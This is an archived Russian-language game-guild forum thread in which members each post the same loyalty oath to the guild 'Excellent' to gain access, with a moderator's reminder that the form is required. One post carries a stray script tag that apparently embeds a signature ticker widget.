Четверг, 26.06.2025, 08:21
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Архив - только для чтения
Получение доступа
RuhaДата: Среда, 01.02.2012, 06:58 | Сообщение # 61
Начинающий флудер
Group: Future Excellent

Flood Level: 414

Registration was: 16.11.2010
Status: Offline
Я,Ruha, вступаю в
гильдию Excellent, присягаю на
верность своему решению до
последнего. Клянусь соблюдать
устав гильдии Excellent и все
разъяснения к нему, выполнять
требования воинских нормативов,
приказы офицеров, возложенные на
меня правовым образом
обязанности. Клянусь, находясь в
гильдии, быть честным,
добросовестным, достойно
переносить связанные с ней
трудности. Мужественно, не щадя
кукол и хирок, защищать
согильдийцев и политические
интересы гильдии Excellent.
Клянусь не применять оружие
против своих собратьев по гильдии.
Обязуюсь посещать все
Территориальные Воины, все
клановые Эвенты в какое время они
не были бы.
Если же я нарушу принятую мною
Военную присягу, то готов нести
ответственность, установленную
законами Гильдии Excellent.

АдЕльКаДата: Среда, 01.02.2012, 10:07 | Сообщение # 62
Экселлент-пользователь
Group: Ex-Excellent

Flood Level: 134

Registration was: 11.04.2011
Я, АдЕльКа, вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы.
Если же я нарушу принятую мною Военную присягу, то готов нести ответственность, установленную законами Гильдии Excellent.

ЛилитаДата: Среда, 01.02.2012, 11:15 | Сообщение # 63
n00b

Flood Level: 49

Registration was: 16.05.2011
Я, Лилита, вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы.
Если же я нарушу принятую мною Военную присягу, то готов нести ответственность, установленную законами Гильдии Excellent.

XlopushkaДата: Среда, 01.02.2012, 11:31 | Сообщение # 64
Экселлент-пользователь
Group: Future Excellent

Flood Level: 173

Registration was: 14.05.2011
Я, Xlopushka, вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы.

</a><script type="text/javascript" src="http://flines.ru/timelinejs/1058658.js"></script>

En la gloria Excellent!

DivеrДата: Среда, 01.02.2012, 15:26 | Сообщение # 65
n00b
Group: Excellent Guild

Flood Level: 52

Registration was: 29.01.2012
Я, Diver, вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы.
Если же я нарушу принятую мною Военную присягу, то готов нести ответственность, установленную законами Гильдии Excellent

MaNiaKДата: Среда, 01.02.2012, 15:32 | Сообщение # 66
n00b

Flood Level: 65

Registration was: 09.07.2011
Я, MaNiaK, вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы.

лЁХAДата: Среда, 01.02.2012, 16:02 | Сообщение # 67
n00b

Flood Level: 98

Registration was: 28.08.2011
Я, лЁХА, вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы.

ЧотkийДата: Среда, 01.02.2012, 16:27 | Сообщение # 68
n00b

Flood Level: 56

Registration was: 31.08.2011
Я, Чотkий_Я!, вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы.

капитан_varkkanДата: Среда, 01.02.2012, 18:56 | Сообщение # 69
Барыга Excellent

Flood Level: 288

Registration was: 19.09.2010
Я, Kirsan, вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы.

Каждый участник гильдии обязан заполнить форму выше, тем самым расписавшись под уставом и всеми вытекающими из этого обязанностями.
Без заполнения данной формы, получение доступа невозможно.
!!!ВНИМАНИЕ!!! Раздел для получения доступа в первый состав.

АлкмаарДата: Среда, 01.02.2012, 20:24 | Сообщение # 70
Экселлент-пользователь
Group: Excellent Guild

Flood Level: 169

Registration was: 15.04.2011
Я, Алкмаар, вступаю в гильдию Excellent, присягаю на верность своему решению до последнего. Клянусь соблюдать устав гильдии Excellent и все разъяснения к нему, выполнять требования воинских нормативов, приказы офицеров, возложенные на меня правовым образом обязанности. Клянусь, находясь в гильдии, быть честным, добросовестным, достойно переносить связанные с ней трудности. Мужественно, не щадя кукол и хирок, защищать согильдийцев и политические интересы гильдии Excellent. Клянусь не применять оружие против своих собратьев по гильдии. Обязуюсь посещать все Территориальные Воины, все клановые Эвенты в какое время они не были бы.

Поиск: